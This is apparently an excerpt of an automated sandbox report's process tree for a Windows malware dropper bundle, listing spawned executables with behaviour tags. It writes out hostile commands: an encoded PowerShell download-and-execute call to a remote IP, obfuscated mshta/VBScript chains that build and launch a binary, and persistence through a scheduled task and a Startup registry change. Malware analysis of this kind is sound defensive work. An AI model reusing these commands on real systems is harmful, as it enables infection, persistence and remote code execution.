C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
C:\Users\Admin\AppData\Local\Temp\4d-69de5-3a2-74ea8-7aeff9e22a1d3\Megisheqyha.exe"C:\Users\Admin\AppData\Local\Temp\4d-69de5-3a2-74ea8-7aeff9e22a1d3\Megisheqyha.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 24014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exeC:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exeC:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe"C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe" -u14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 24014⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tie4k5dz.t0a\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\Pictures\Adobe Films\lmWL8_fCaR7KpxPFWCpSZATT.exe"C:\Users\Admin\Pictures\Adobe Films\lmWL8_fCaR7KpxPFWCpSZATT.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee011⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,3647991501014532599,7271685998684445581,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1992_1247375866" --mojo-platform-channel-handle=1724 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\wppjUuKifwe5OKIA6JpZTWg9.exe"C:\Users\Admin\Pictures\Adobe Films\wppjUuKifwe5OKIA6JpZTWg9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\2o0JrOSDBo9q9SSTMzVCyTia.exe"C:\Users\Admin\Pictures\Adobe Films\2o0JrOSDBo9q9SSTMzVCyTia.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"3⤵
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\655.exeC:\Users\Admin\AppData\Local\Temp\655.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\655.exeC:\Users\Admin\AppData\Local\Temp\655.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\722F.exeC:\Users\Admin\AppData\Local\Temp\722F.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7CB0.exeC:\Users\Admin\AppData\Local\Temp\7CB0.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\9615.exeC:\Users\Admin\AppData\Local\Temp\9615.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8732 -s 2803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\B7F6.exeC:\Users\Admin\AppData\Local\Temp\B7F6.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1430.exeC:\Users\Admin\AppData\Local\Temp\1430.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat "C:\Users\Admin\AppData\Local\Temp\1430.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat "C:\Users\Admin\AppData\Local\Temp\1430.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA5⤵
- Blocklisted process makes network request
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe"3⤵
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\3DD1.exeC:\Users\Admin\AppData\Local\Temp\3DD1.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7D0E.exeC:\Users\Admin\AppData\Local\Temp\7D0E.exe2⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 2763⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\8471.exeC:\Users\Admin\AppData\Local\Temp\8471.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2963⤵
- Program crash
- Checks processor information in registry
-
C:\Program Files (x86)\U1bjp\bt1htnhplf.exe"C:\Program Files (x86)\U1bjp\bt1htnhplf.exe"2⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8339b8a3901ebc775730ad458de2a583 OA4En7LMH0egnJJlDMRm8Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-INFBI.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-INFBI.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$30118,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-LOUD0.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-LOUD0.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$30172,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-8CMQ3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-8CMQ3.tmp\postback.exe" ss14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exeWed094c47c32b.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"3⤵
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "7⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exe" -u2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed096a1bff61.exeWed096a1bff61.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4254119.exe"C:\Users\Admin\AppData\Roaming\4254119.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\1823905.exe"C:\Users\Admin\AppData\Roaming\1823905.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\1392420.exe"C:\Users\Admin\AppData\Roaming\1392420.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\7069117.exe"C:\Users\Admin\AppData\Roaming\7069117.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\8246734.exe"C:\Users\Admin\AppData\Roaming\8246734.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 2965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\12432.exe"C:\Users\Admin\AppData\Roaming\12432.exe"4⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7472820.exe"C:\Users\Admin\AppData\Roaming\7472820.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 2364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7024 -s 17244⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 6004⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee06⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2476 /prefetch:16⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2396 /prefetch:86⤵
-
